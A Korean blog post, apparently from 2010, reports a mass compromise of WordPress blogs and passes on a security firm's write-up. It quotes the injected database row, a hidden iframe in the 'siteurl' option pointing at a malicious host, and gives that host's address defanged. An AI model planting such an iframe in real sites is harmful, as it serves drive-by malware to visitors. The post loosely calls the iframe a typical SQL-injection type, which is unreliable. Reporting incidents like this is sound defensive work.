워드프레스(WP, WordPress)는 외국에서 개발되어 제공되는 설치형 블로그 툴입니다. 설치형이지만, 이미 몇몇 회사에서는 Saas 형식으로 서비스되고 있으며, 국내에서도 한 곳에서 서비스 중에 있습니다.

최근, 워드 프레스로 구현된 블로그 수백여개에서 데이터베이스가 손상되는 문제점이 발견되었습니다. 공격으로 인한 피해가 최신 버전의 WP에서도 발견된 것으로 알려져 있습니다.

삽입된 코드는 SQL Injection 공격의 대표적인 유형인 <iframe>이 포함되어 있는 것으로 보아 SQL Injection 취약점을 통해 공격한 것으로 추측됩니다. 그리고, 관리자페이지(~/wp-admin/)에 로그온이 제대로 되지 않는 문제점이 보여집니다.

(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),

공격 당한 사이트 URL: hxxp://networkads.net/grep/

한편, 아직 공격당한 지점(Entry Point)를 알아 내지 못하고 있으며, 임시로 DB에 주입된 문자열을 제거하는 수밖에는 없다고 합니다.

출처: http://blog.sucuri.net/2010/04/mass-infection-of-wordpress-blogs-at.html

PS: 보안 제품(안티바이러스)가 설치되지 않은 경우에는 공격 당한 사이트에 방문하면 큰일납니다. 참고로, 어베스트!에서는 잡아내므로 안심해도 됩니다.

PS: 해당 문제의 원인은 관리 페이지의 권한 문제였습니다.

끝.
reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus

    댓글을 달아 주세요



    Web Analytics Blogs Directory